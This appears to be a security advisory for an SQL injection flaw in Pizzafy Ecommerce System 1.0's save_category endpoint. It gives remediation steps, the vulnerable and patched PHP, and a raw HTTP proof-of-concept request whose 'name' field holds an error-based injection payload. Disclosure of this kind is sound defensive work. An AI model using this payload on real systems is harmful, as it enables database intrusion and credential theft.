# Vulnerability Summary: Pizzafy Ecommerce System 1.0 SQL Injection Vulnerability ## Vulnerability Overview - **Affected Version**: Pizzafy Ecommerce System 1.0 - **Vulnerability Type**: SQL Injection (Error-based SQL Injection) - **Severity**: HIGH - **Status**: Unpatched - **Vulnerable Endpoint**: `pizzafy/admin/ajax.php?action=save_category` - **Vulnerability Description**: - An error-based SQL injection vulnerability was identified in the `save_category` functionality. - The root cause is the improper sanitization of the `name` parameter and the `name` column, allowing attackers to inject malicious SQL commands into backend database queries. ## Impact Scope - **Confidentiality**: Full exposure of database schema and user credentials - **Integrity**: Unauthorized deletion or modification of records - **Availability**: Service disruption due to large-scale data deletion - **Privilege Escalation**: Session hijacking and administrative access ## Remediation 1. **Use Prepared Statements**: Implement parameterized queries to prevent SQL injection. 2. **Input Validation**: Validate and sanitize the `name` parameter, allowing only expected values. 3. **Database Permissions**: Restrict database user privileges to limit the potential damage of SQL injection attacks. 4. **Monitoring and Logging**: Track and alert on anomalous patterns, such as unusual queries or repeated attempts. 5. **Security Testing**: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities. 6. **Error Handling**: Avoid exposing database-related errors in responses, as this information can assist attackers. ## Vulnerable Code ```php function save_category(){ extract($_POST); $data = " name = '$name' "; if(empty($id)){ $save = $this->conn->query("INSERT INTO category_list set ".$data); }else{ $save = $this->conn->query("UPDATE category_list set ".$data." where id='".$id."'"); } if($save){ return 1; } else { return $this->conn->error; } } ``` ## Exploit Code ```http POST /pizzafy/admin/ajax.php?action=save_category HTTP/1.1 Host: localhost Content-Length: 286 sec-ch-ua: Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryd8Yid37qqPcyPw2H X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/pizzafy/admin/index.php?page=categories Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: __SMSG_logged=2; __SMSG_key=286b8e5962b2c723e9bfba4bceec7a8aec379ceee87f8d85d6cb304df687ec; PM Connection: close ------WebKitFormBoundaryd8Yid37qqPcyPw2H Content-Disposition: form-data; name="id" 1 ------WebKitFormBoundaryd8Yid37qqPcyPw2H Content-Disposition: form-data; name="name" name: test10' OR extractvalue(1, concat(0x7e, version())) -- ------WebKitFormBoundaryd8Yid37qqPcyPw2H-- ``` ## Patched Code ```php function save_category(){ $id = isset($_POST['id']) ? (int)$_POST['id'] : 0; $name = isset($_POST['name']) ? trim($_POST['name']) : ''; if(empty($name)){ return "Name is necessary."; } if(empty($id)){ $stmt = $this->conn->prepare("INSERT INTO category_list (name) VALUES (?)"); $stmt->bind_param("s", $name); } else { $stmt = $this->conn->prepare("UPDATE category_list SET name = ? WHERE id = ?"); $stmt->bind_param("si", $name, $id); } if($stmt->execute()){ return 1; } else { error_log("Error to save category: " . $stmt->error); return 0; } } ```